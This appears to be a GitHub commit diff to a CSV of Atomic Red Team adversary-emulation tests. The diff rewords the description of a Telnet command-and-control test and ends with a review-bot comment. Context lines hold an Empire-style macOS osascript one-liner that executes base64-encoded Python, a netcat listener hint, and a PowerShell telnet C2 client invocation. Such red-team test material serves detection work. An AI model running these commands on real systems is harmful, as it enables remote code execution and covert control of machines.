2024-08-26 - 11:09 IST - Atomic Red Attack Extraction
geopd committed Aug 26, 2024
1 parent dba2f92 commit 8ffeaa5
Showing 2 changed files with 3 additions and 3 deletions.
4 changes: 2 additions & 2 deletions atomic-red-attacks.csv
Expand Up @@ -25533,9 +25533,9 @@ You can use netcat to listen for the connection and verify execution, e.g. use "
Reference: https://github.com/EmpireProject/Empire
",macos,,,"osascript -e ""do shell script \""echo \\\""import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\"" | python &\""""
",sh,,,,,,
T1071,Application Layer Protocol,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,"An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives.
T1071,Application Layer Protocol,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,"An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
",windows,,,"#{client_path} #{server_ip} --port #{server_port}
",powershell,,,,powershell,"dependencies.0.description: Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe)
",powershell,,,,powershell,"dependencies.0.description: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)

dependencies.0.prereq_command: $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
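
Review bot: in the reworded dependencies.0.description for the T1071 Telnet C2 row, "a specified server with a specified IP" is still looser than the prereq_command directly below it, which tests #{server_ip} and #{server_port} with Test-NetConnection. Naming those two input arguments in the description would tie the prerequisite text to the check that enforces it. Separately, both edits in this hunk are wording-only changes to a CSV that the commit title describes as an extraction; if the file is regenerated from the atomics, the same wording fix needs to land in the source it is extracted from or it will be lost on the next run.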